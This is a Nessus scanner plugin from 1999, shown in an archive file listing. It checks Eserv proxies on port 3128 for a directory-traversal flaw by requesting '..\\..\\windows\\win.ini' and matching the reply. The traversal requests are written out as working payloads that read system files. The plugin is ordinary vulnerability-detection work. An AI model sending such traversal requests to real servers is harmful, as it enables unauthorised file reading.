home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / eserv.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  91 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10063);
  10.  script_bugtraq_id(773);
  11.  script_version ("$Revision: 1.18 $");
  12.  script_cve_id("CAN-1999-1509");
  13.  name["english"] = "Eserv traversal";
  14.  name["francais"] = "Eserv traversal";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. It is possible to read arbitrary files on
  19. the remote server by prepending ../../
  20. or ..\..\ in front on the file name.
  21.  
  22. Solution : Use another web proxy
  23. Risk factor : High";
  24.  
  25.  desc["francais"] = "Il est possible de lire
  26. n'importe quel fichier sur la machine distante
  27. en ajoutant des points devant leur noms,
  28. tels que ../../ ou ..\..\.
  29.  
  30.  
  31. Solution : dΘsactivez ce service et installez
  32. un vrai proxy
  33.  
  34. Facteur de risque : ElevΘ";
  35.  
  36.  script_description(english:desc["english"], francais:desc["francais"]);
  37.  
  38.  summary["english"] = "\..\..\file.txt";
  39.  summary["francais"] = "\..\..\file.txt";
  40.  script_summary(english:summary["english"], francais:summary["francais"]);
  41.  
  42.  script_category(ACT_GATHER_INFO);
  43.  
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  46.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  47.  family["english"] = "Remote file access";
  48.  family["francais"] = "AccΦs aux fichiers distants";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes");
  51.  script_require_ports(3128);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58.  
  59. include("http_func.inc");
  60.  
  61. port = 3128;
  62.  
  63. if(get_port_state(port))
  64. {
  65. req1 = http_get(item:"..\\..\\..\\..\\..\\..\\windows\\win.ini", port:port);
  66. req2 = http_get(item:"..\\..\\..\\..\\..\\..\\winnt\\win.ini", port:port);
  67.  
  68.  
  69. soc = http_open_socket(port);
  70. if(soc)
  71. {
  72.  send(socket:soc, data:req1);
  73.  r = http_recv(socket:soc);
  74.  http_close_socket(soc);
  75.  if("[windows]" >< r){
  76.      security_hole(port);
  77.     exit(0);
  78.     }
  79.  soc2 = http_open_socket(port);
  80.  send(socket:soc2, data:req2);
  81.  r = http_recv(socket:soc2);
  82.  http_close_socket(soc2);
  83.  if("[fonts]" >< r){
  84.      security_hole(port);
  85.     exit(0);
  86.     }
  87.  }
  88. }
  89.  
  90.  
  91.